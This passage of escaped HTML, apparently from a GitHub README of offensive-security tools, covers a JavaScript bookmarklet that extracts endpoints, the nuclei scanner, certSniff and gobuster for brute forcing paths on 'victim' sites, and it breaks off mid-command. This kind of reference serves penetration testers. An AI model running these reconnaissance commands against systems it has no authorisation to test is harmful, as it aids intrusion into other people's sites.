href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://twitter.com/renniepak/status/1602620834463588352\" rel=\"nofollow\"\u003ejsendpoints\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-jsendpoints\" class=\"anchor\" aria-label=\"Permalink: 🔙jsendpoints\" href=\"#jsendpoints\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA JavaScript bookmarklet for extracting all webpage endpoint links on a page.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreated by \u003ca href=\"https://twitter.com/renniepak\" rel=\"nofollow\"\u003e@renniepak\u003c/a\u003e, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-js notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"javascript:(function(){var scripts=document.getElementsByTagName(\u0026quot;script\u0026quot;),regex=/(?\u0026lt;=(\\\u0026quot;|\\'|\\`))\\/[a-zA-Z0-9_?\u0026amp;=\\/\\-\\#\\.]*(?=(\\\u0026quot;|\\'|\\`))/g;const results=new Set;for(var i=0;i\u0026lt;scripts.length;i++){var t=scripts[i].src;\u0026quot;\u0026quot;!=t\u0026amp;\u0026amp;fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log(\u0026quot;An error occurred: \u0026quot;,t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+\u0026quot;\u0026lt;br\u0026gt;\u0026quot;)})}setTimeout(writeResults,3e3);})();\"\u003e\u003cpre\u003ejavascript:\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003escripts\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003edocument\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003egetElementsByTagName\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"script\"\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eregex\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(?\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\'\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\`\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\/\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ea\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ez\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eA\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eZ\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e9\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e_\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e?\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e\u0026amp;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\/\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\-\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\#\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\.\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e*\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(?\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\'\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e|\u003c/span\u003e\u003cspan class=\"pl-cce\"\u003e\\`\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003eg\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003econst\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-k\"\u003enew\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eSet\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efor\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003escripts\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003elength\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e++\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003escripts\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003esrc\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"\"\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e!=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e\u003cspan class=\"pl-en\"\u003efetch\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ethen\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003etext\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ethen\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ee\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ematchAll\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eregex\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efor\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003elet\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003er\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eof\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ee\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eadd\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003er\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ecatch\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003econsole\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003elog\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"An error occurred: \"\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epageContent\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003edocument\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003edocumentElement\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eouterHTML\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ematches\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003epageContent\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ematchAll\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eregex\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efor\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003econst\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ematch\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eof\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ematches\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eadd\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ematch\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e[\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e]\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e \u003cspan class=\"pl-en\"\u003ewriteResults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eresults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eforEach\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-k\"\u003efunction\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e{\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003edocument\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003ewrite\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003et\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e+\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"\u0026lt;br\u0026gt;\"\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-en\"\u003esetTimeout\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ewriteResults\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e3e3\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e}\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Bookmarklet)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreate a bookmarklet...\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eRight click your bookmark bar\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eClick 'Add Page'\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePaste the above Javascript in the 'url' box\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eClick 'Save'\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e...then visit the victim page in the browser and click the bookmarklet.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage (Console)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003ePaste the above Javascript into the console window \u003ccode\u003eF12\u003c/code\u003e and press enter.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/projectdiscovery/nuclei\"\u003enuclei\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-nuclei\" class=\"anchor\" aria-label=\"Permalink: 🔙nuclei\" href=\"#nuclei\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFast vulnerability scanner that uses .yaml templates to search for specific issues.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest\"\u003e\u003cpre\u003ego install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"cat domains.txt | nuclei -t /PATH/nuclei-templates/\"\u003e\u003cpre\u003ecat domains.txt \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e nuclei -t /PATH/nuclei-templates/\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/A-poc/certSniff\"\u003ecertSniff\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-certsniff\" class=\"anchor\" aria-label=\"Permalink: 🔙certSniff\" href=\"#certsniff\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ecertSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/A-poc/certSniff\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e certSniff/\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 certSniff.py -f example.txt\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ecertSniff\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003epy\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ef\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eexample\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003etxt\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.kali.org/tools/gobuster/\" rel=\"nofollow\"\u003egobuster\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gobuster\" class=\"anchor\" aria-label=\"Permalink: 🔙gobuster\" href=\"#gobuster\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for brute forcing file/folder paths on a victim website.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install gobuster\"\u003e\u003cpre\u003esudo apt install gobuster\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"gobuster dir -u 